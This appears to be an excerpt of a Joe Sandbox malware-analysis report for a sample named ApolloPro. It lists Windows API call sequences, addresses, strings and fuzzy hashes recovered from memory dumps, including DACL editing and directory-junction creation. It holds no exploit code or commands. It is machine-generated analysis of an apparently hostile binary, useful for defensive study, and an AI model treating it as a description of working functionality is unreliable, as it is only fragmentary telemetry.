                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006BA972
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006BA994
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006BA9A7
                                                                                              • DestroyWindow.USER32(00000000), ref: 006BA9C9
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00630000,00000000), ref: 006BAA00
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006BAA19
                                                                                              • GetDesktopWindow.USER32 ref: 006BAA32
                                                                                              • GetWindowRect.USER32(00000000), ref: 006BAA39
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006BAA51
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006BAA69
                                                                                                • Part of subcall function 006329AB: GetWindowLongW.USER32(?,000000EB), ref: 006329BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 1297703922-3619404913
                                                                                              • Opcode ID: 7d1f1fef3101bed105595cf1e0461c4e6872d57c87a32a8b5491268bc6276930
                                                                                              • Instruction ID: b961f241c44c5c1c5ff71ec401d9ef34d6f1699cb92cb520b8d2ed01ef179a42
                                                                                              • Opcode Fuzzy Hash: 7d1f1fef3101bed105595cf1e0461c4e6872d57c87a32a8b5491268bc6276930
                                                                                              • Instruction Fuzzy Hash: C47179B1150204AFE721DF68CC49FBB77E6EB89304F04061DF985973A1D770A982DB62
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 006BCCCF
                                                                                                • Part of subcall function 006BB1A9: ClientToScreen.USER32(?,?), ref: 006BB1D2
                                                                                                • Part of subcall function 006BB1A9: GetWindowRect.USER32(?,?), ref: 006BB248
                                                                                                • Part of subcall function 006BB1A9: PtInRect.USER32(?,?,006BC6BC), ref: 006BB258
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 006BCD38
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006BCD43
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006BCD66
                                                                                              • _wcscat.LIBCMT ref: 006BCD96
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006BCDAD
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 006BCDC6
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 006BCDDD
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 006BCDFF
                                                                                              • DragFinish.SHELL32(?), ref: 006BCE06
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006BCEF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 169749273-3440237614
                                                                                              • Opcode ID: 976e35ee2df6b5333b850b1493e56081846ba823eab09cd0a93f48fc6c5b5172
                                                                                              • Instruction ID: 96edfb81d6da734aa28fd3cf2321238dd4c241c46b25a301baaf916520ce4426
                                                                                              • Opcode Fuzzy Hash: 976e35ee2df6b5333b850b1493e56081846ba823eab09cd0a93f48fc6c5b5172
                                                                                              • Instruction Fuzzy Hash: 65619E71508301AFD701DF50DC85DAFBBEAEF89350F000A2EF595922A1DB70AA49CB56
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0069831A
                                                                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00698323
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0069832F
                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0069841D
                                                                                              • __swprintf.LIBCMT ref: 0069844D
                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00698479
                                                                                              • VariantInit.OLEAUT32(?), ref: 0069852A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 006985BE
                                                                                              • VariantClear.OLEAUT32(?), ref: 00698618
                                                                                              • VariantClear.OLEAUT32(?), ref: 00698627
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00698665
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                              • API String ID: 3730832054-3931177956
                                                                                              • Opcode ID: f3642c194f948b7cdd3dc6fe67beac41e9016598b327c5240d66af2de69e7b8b
                                                                                              • Instruction ID: 9396b335a0fa91f162c82a0f49ee2cd587bb6cef2cc1680d6e4b13e5617d5ab5
                                                                                              • Opcode Fuzzy Hash: f3642c194f948b7cdd3dc6fe67beac41e9016598b327c5240d66af2de69e7b8b
                                                                                              • Instruction Fuzzy Hash: EBD1BD31604515EFDF609FA5C884BBEB7BABF46B00F148159E805DBA81DF34E845DBA0
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006B4A61
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B4AAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 3974292440-4258414348
                                                                                              • Opcode ID: 2354a3def41404f7999111ef49d86755098258b7a5726c5016d481ae88ed8d13
                                                                                              • Instruction ID: 17cd420ed0935442d6f9ddee85a0132d83dad897358430fe52dac839616623cd
                                                                                              • Opcode Fuzzy Hash: 2354a3def41404f7999111ef49d86755098258b7a5726c5016d481ae88ed8d13
                                                                                              • Instruction Fuzzy Hash: A0916E702047119BCB44EF20C851AAAB7A3AF94354F14895DF8965B3A3DF31FD8ACB85
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006BBF26
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006B97E7), ref: 006BBF82
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006BBFBB
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006BBFFE
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006BC035
                                                                                              • FreeLibrary.KERNEL32(?), ref: 006BC041
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006BC051
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,006B97E7), ref: 006BC060
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006BC07D
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006BC089
                                                                                                • Part of subcall function 0065312D: __wcsicmp_l.LIBCMT ref: 006531B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 1212759294-1154884017
                                                                                              • Opcode ID: 8c4cbe5663beb2c942c28399ee1824e91e97864cddf22b845d2d089065b2ac99
                                                                                              • Instruction ID: f914f74f0e369784c3b93de35010f15dcea1569d328278e85a59338bd860a585
                                                                                              • Opcode Fuzzy Hash: 8c4cbe5663beb2c942c28399ee1824e91e97864cddf22b845d2d089065b2ac99
                                                                                              • Instruction Fuzzy Hash: 2B61E1B1500619FAEB24DF64CC41FFE77AEEB08721F104209F915D61C0DBB5AA90DBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 0069E31F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0069E32F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0069E33B
• __wsplitpath.LIBCMT ref: 0069E399
• _wcscat.LIBCMT ref: 0069E3B1
• _wcscat.LIBCMT ref: 0069E3C3
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0069E3D8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0069E3EC
• SetCurrentDirectoryW.KERNEL32(?), ref: 0069E41E
• SetCurrentDirectoryW.KERNEL32(?), ref: 0069E43F
• _wcscpy.LIBCMT ref: 0069E44B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0069E48A
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: e837e76ae4a597e62e0003c0038acd55e462afefd534e97c1a1562a4e27de8be
• Instruction ID: e241e91f4acf94156434a764b8cc1725d6ec90df9d6f8aa7fc067b80763d05b4
• Opcode Fuzzy Hash: e837e76ae4a597e62e0003c0038acd55e462afefd534e97c1a1562a4e27de8be
• Instruction Fuzzy Hash: A86169725042059FCB10EF60C8449AEB3EEBF89310F04891EF98987651DB36EA45CB96
APIs
  • Part of subcall function 00631F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00632412,?,00000000,?,?,?,?,00631AA7,00000000,?), ref: 00631F76
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006324AF
• KillTimer.USER32(-00000001,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0063254A
• DestroyAcceleratorTable.USER32(00000000), ref: 0066BFE7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0066C018
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0066C02F
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0066C04B
• DeleteObject.GDI32(00000000), ref: 0066C05D
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID: hl
• API String ID: 641708696-742643120
• Opcode ID: 9743703d94c2dcff9cf19a326ea71cccc895e4db9c58751fe08a9f8d3abdc2a0
• Instruction ID: 71de1d66d36fa82b28e9d324e69a10313e53a1cb31c761b3cad3a3ab2ba658ea
• Opcode Fuzzy Hash: 9743703d94c2dcff9cf19a326ea71cccc895e4db9c58751fe08a9f8d3abdc2a0
• Instruction Fuzzy Hash: A9617931114A02DFDB25AF18D958B7AB7F3FB40326F10A52DE0924BA60C772A891DFD4
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0069A2C2
  • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0069A2E3
• __swprintf.LIBCMT ref: 0069A33C
• __swprintf.LIBCMT ref: 0069A355
• _wprintf.LIBCMT ref: 0069A3FC
• _wprintf.LIBCMT ref: 0069A41A
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: 77df49eec3c8fbc1fc6e8441cfc50cb3c087f4b37654c0038f4f31ecef338405
• Instruction ID: 3e3ba0f9ba10839aebf274f7f9c4d3d7edbfcc26fa59664bab6c640c76578443
• Opcode Fuzzy Hash: 77df49eec3c8fbc1fc6e8441cfc50cb3c087f4b37654c0038f4f31ecef338405
• Instruction Fuzzy Hash: EF51E271800219BACF54EBE0CD46EEEB7BBAF05340F100169F505B6192EB352F99DB95
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,0067F8B8,00000001,0000138C,00000001,00000001,00000001,?,006A3FF9,00000001), ref: 0069009A
• LoadStringW.USER32(00000000,?,0067F8B8,00000001), ref: 006900A3
  • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
• GetModuleHandleW.KERNEL32(00000000,006F7310,?,00000FFF,?,?,0067F8B8,00000001,0000138C,00000001,00000001,00000001,?,006A3FF9,00000001,00000001), ref: 006900C5
• LoadStringW.USER32(00000000,?,0067F8B8,00000001), ref: 006900C8
• __swprintf.LIBCMT ref: 00690118
• __swprintf.LIBCMT ref: 00690129
• _wprintf.LIBCMT ref: 006901D2
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 006901E9
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: e17f8ed6c47d7b5f0d8ed8ce7efea14ac3211fbfcb4c85da7931932332fa28f4
• Instruction ID: dbc5cbcd6cea804ef9281eba4e26161cb97129ae1de1a9ecb43b5c4ee3aa575a
• Opcode Fuzzy Hash: e17f8ed6c47d7b5f0d8ed8ce7efea14ac3211fbfcb4c85da7931932332fa28f4
• Instruction Fuzzy Hash: 3B41917280021DAADF54EBE0CD96DEEB77EAF16340F100169F501B6092DB346F89CBA5
APIs
  • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
  • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
• CharLowerBuffW.USER32(?,?), ref: 0069AA0E
• GetDriveTypeW.KERNEL32 ref: 0069AA5B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069AAA3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069AADA
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0069AB08
  • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 8974f10b4442e7f0d1205495349ed50e453832cb4c4e4726a69c7f806addd767
• Instruction ID: 37e70da361671a483a8e5f6c186dcc3d648efde856ebf24935b51ffb2f00e7a3
• Opcode Fuzzy Hash: 8974f10b4442e7f0d1205495349ed50e453832cb4c4e4726a69c7f806addd767
• Instruction Fuzzy Hash: 65519D711043059FC740EF50C98196AB7FAFF99358F10492CF8969B2A1DB31EE0ACB96
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0069A852
• __swprintf.LIBCMT ref: 0069A874
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0069A8B1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0069A8D6
• _memset.LIBCMT ref: 0069A8F5
• _wcsncpy.LIBCMT ref: 0069A931
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0069A966
• CloseHandle.KERNEL32(00000000), ref: 0069A971
• RemoveDirectoryW.KERNEL32(?), ref: 0069A97A
• CloseHandle.KERNEL32(00000000), ref: 0069A984
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: a16bbeb4213843a56e1d68e78b6fe9bbe2dd1c97d72f2324ae0ccedc0119ef71
• Instruction ID: 8435e0c4b9847db80492a98ddc76d81841f0a3e7d6e462ac1ad2e5b781965d2a
• Opcode Fuzzy Hash: a16bbeb4213843a56e1d68e78b6fe9bbe2dd1c97d72f2324ae0ccedc0119ef71
• Instruction Fuzzy Hash: 8731B27151021AABDB219FA4DC49FFB73BEEF89700F1041A6F908D2160E77497458B65
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,006B982C,?,?), ref: 006BC0C8
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC0DF
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC0EA
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC0F7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 006BC100
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC10F
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 006BC118
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC11F
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,006B982C,?,?,00000000,?), ref: 006BC130
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,006C3C7C,?), ref: 006BC149
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 006BC159
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 006BC17D
                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 006BC1A8
                                                                                              • DeleteObject.GDI32(00000000), ref: 006BC1D0
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006BC1E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
APIs
  • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006BC8A4
• GetFocus.USER32 ref: 006BC8B4
• GetDlgCtrlID.USER32(00000000), ref: 006BC8BF
• _memset.LIBCMT ref: 006BC9EA
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006BCA15
• GetMenuItemCount.USER32(?), ref: 006BCA35
• GetMenuItemID.USER32(?,00000000), ref: 006BCA48
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006BCA7C
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006BCAC4
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006BCAFC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006BCB31
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
APIs
  • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
  • Part of subcall function 00688E20: GetLastError.KERNEL32(?,00688900,?,?,?), ref: 00688E46
  • Part of subcall function 00688E20: GetProcessHeap.KERNEL32(00000008,?,?,00688900,?,?,?), ref: 00688E55
  • Part of subcall function 00688E20: HeapAlloc.KERNEL32(00000000,?,00688900,?,?,?), ref: 00688E5C
  • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00688E73
  • Part of subcall function 00688EBD: GetProcessHeap.KERNEL32(00000008,00688916,00000000,00000000,?,00688916,?), ref: 00688EC9
  • Part of subcall function 00688EBD: HeapAlloc.KERNEL32(00000000,?,00688916,?), ref: 00688ED0
  • Part of subcall function 00688EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00688916,?), ref: 00688EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00688B2E
• _memset.LIBCMT ref: 00688B43
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00688B62
• GetLengthSid.ADVAPI32(?), ref: 00688B73
• GetAce.ADVAPI32(?,00000000,?), ref: 00688BB0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00688BCC
• GetLengthSid.ADVAPI32(?), ref: 00688BE9
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00688BF8
• HeapAlloc.KERNEL32(00000000), ref: 00688BFF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00688C20
• CopySid.ADVAPI32(00000000), ref: 00688C27
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00688C58
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00688C7E
